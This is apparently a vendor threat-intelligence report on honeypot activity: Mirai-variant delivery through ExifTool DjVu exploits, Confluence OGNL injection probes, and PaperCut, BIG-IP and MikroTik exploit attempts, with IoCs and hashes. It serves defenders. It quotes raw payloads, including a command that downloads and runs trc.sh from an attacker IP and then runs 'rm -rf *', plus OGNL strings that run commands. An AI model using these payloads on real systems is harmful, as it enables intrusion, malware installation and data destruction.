After a summer break, we are back with observations on our honeypots to provide you with information on what is going on the Internet. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adjust the cybersecurity posture.
The following report focuses on logs from the past month.
Check out our previous report here.
Mirai-based variants downloaded in JPG files
In August 2023, TEHTRIS monitored 11 IP addresses sending POST requests with a jpg file hiding commands aiming at downloading the Mirai botnet. The requests were all aiming at a Singaporean honeypot.
- Timeline
We observed a constant flow of incoming requests from July 31st until August 11th, then a decrease followed by a surge on August 15th.
The commandlines seem to be hidden in the jpg metadata and would likely be executed upon opening the image.
- Characteristics of the requests
The URL is “/$” followed by 4 digits.
URL | Count |
/$3261 | 97.15% |
/$6684 | 2.478% |
/$6341 | 0.248% |
/$5341 | 0.124% |
The RawData section contains the interesting part :
'--0002cdabf64440e48c7a0192d8bef98e\r\nContent-Type: image/jpeg\r\nContent-Disposition: form-data; name="file"; filename="lol.jpg"\r\nContent-Length: 1251\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright "\\\n" . qx{cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://195.58.39.193/trc.sh; curl -O <URL>; chmod 777 <filename>; sh <filename>;; rm -rf *;}. \\\n" b ") ) \n} . \\\n" b ") ) \n\r\n--0002cdabf64440e48c7a0192d8bef98e--\r\n'
This is very likely an attempt to exploit CVE-2021-22204 (CVSS3 7.8) and / or CVE-2021-22205 (CVSS3 10), a vulnerability in the ExifTool which can lead to arbitrary code execution due to improper neutralization of userdata in the DjVu file format. ExifTool is a opensource program for reading, writing and manipulating image metadata, used as a component in GitLab among others. This can allow an attacker to execute commands hidden in the metadata.
- Downloaded files
Among the hundreds of requests, 6 unique URLs are found in the rawData, 4 of them downloading Mirai-based variants:
- Shell script trc.sh (sha256 6e01afe2c976a0eefc86312abc911850f611f9f15d944449e148f8749e647f76) known for being a Medusa botnet downloader, is found in 90% of all requests
- ELF file x-8.6.blaze (sha256 e4a89d0596681b36ca880374a28e3728211ec1b69d25216225b83930852c06d0) linked with the Gafgyt botnet
- ELF file x86 (sha256 a204df812308f4426796a1d0a06b06e33b40095189a83b6a7439cd455c2439d3)
- ELF file sora.x86 (sha256 76a75dfab207a8356b959f765e94452e4bc28ae00364c12f2186bb3805506195)
The other two URLs had never been submitted to VirusTotal prior to our investigation.
- IoCs
204.10.194[.]68 | 74.50.95[.]126 |
84.54.51[.]204 | 94.156.102[.]66 |
193.34.212[.]110 | http[:]//195.58.39[.]193/trc.sh |
190.211.252[.]50 | http[:]//45.41.241[.]48/x86_64 |
45.128.232[.]83 | http[:]//87.121.113[.]147/bins/sshdx86 |
66.118.232[.]225 | http[:]//94.156.102[.]166/x-8.6.blaze |
193.177.182[.]23 | http[:]//45.41.241[.]48/x86_64 |
45.95.146[.]79 | http[:]//104.234.220[.]161/sora.x86 |
64.112.72[.]102 |
Swedish IP address targeting Lithuanian honeypots
The same Swedish IP address 77.91.87[.]196 (AS 210644 AEZA GROUP Ltd) has been attempting to find vulnerabilities on our Lithuanian honeypots on August 6th and 9th. The IP address is only flagged malicious by 3 vendors on VirusTotal, none on other databases, and has started to be gradually reported in the past week by a dozen sources to AbuseIPDB. Here is a recap of the exploit attempts:
- Confluence OGNL injection vulnerability (CVE-2022-26134)
Incoming GET requests from Swedish IP address 77.91.87[.]196 probed our Lithuanian honeypots to find Confluence servers vulnerable to the OGNL injection vulnerability tracked as CVE-2022-26134 (CVSS3 9.8). OGNL is a popular expression language for Java. OGNL injection can lead to remote code execution.
URL :
/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun")}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site")}/
The attacker sends a DNS request to oast.site or oast.fun to check if the domain is accessible, and will probably use a second command to download a malicious payload. For instance, at the time of writing, cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun resolves to Singaporean IP address 206.189.156[.]69, which is known for communicating with malicious files such as trojans.
The vulnerability has been fixed in later versions.
- PaperCut Authentication Bypass (CVE-2023-27350)
CVE-2023-27350 (CVSS3 9.8) is a vulnerability that has been disclosed by PaperCut on March 2023 and which enables an unauthenticated user to execute malicious code remotely without credentials. According to an advisory by CISA, the vulnerability was exploited in the wild – including by the Bl00dy ransomware gang in a campaign against the Education sector.
GET request: /app?service=page/SetupCompleted
A patch has since been released.
- BIG-IP iControl REST Authentication Bypass (CVE-2022-1388)
CVE-2022-1388 (CVSS3 9.8) is a vulnerability affecting BIG-IP systems which allows an unauthenticated attacker to execute arbitrary system commands, create or delete files, or disable services.
POST request : /mgmt/tm/util/bash
- BIG-IP/BIG-IQ iControl REST RCE Attempt (CVE-2021-22986)
Similar packets than those detailed in our Report 15 are detected.
- IoCs
77.91.87[.]196
206.189.156[.]69
cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun
cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site
Mikrotik Winbox RCE Attempt (CVE-2018-14847)
Between August 8th and 14th, we monitored attempts to exploit CVE-2018-14847 (CVSS3 9.1) coming from 3 IP addresses :
IP source | Country | AS |
5.104.80[.]129 | DK | AS 14199 ( Contabo Asia Private Limited ) |
51.158.24[.]19 | FR | AS 12876 ( Scaleway S.a.s. ) |
185.38.148[.]134 | GB | AS 25369 ( Hydra Communications Ltd ) |
CVE-2018-14847 (CVSS3 9.1) is a vulnerability affecting MikroTik RouterOS allowing an unauthenticated remote attacker to read and write arbitrary files due to a directory traversal vulnerability in the WinBox interface. It was fixed in 2018 and added to CISA’s Known Exploited Vulnerability catalog in Decembre 2021. Well, apparently, it is still exploited in the wild – although it is the first time we detected this exploit attempt in 2023.
Packets were sent over on TCP/80, TCP/445, TCP/51801 and TCP/52802.
The targets were exclusively European honeypots, with Lithuania, the Czeck Republic and the United Kingdom ahead:
- IoCs
5.104.80[.]129
51.158.24[.]19
185.38.148[.]134
Russian IP addresses probing for vulnerable Asus routers
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
WordPress vulnerability
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.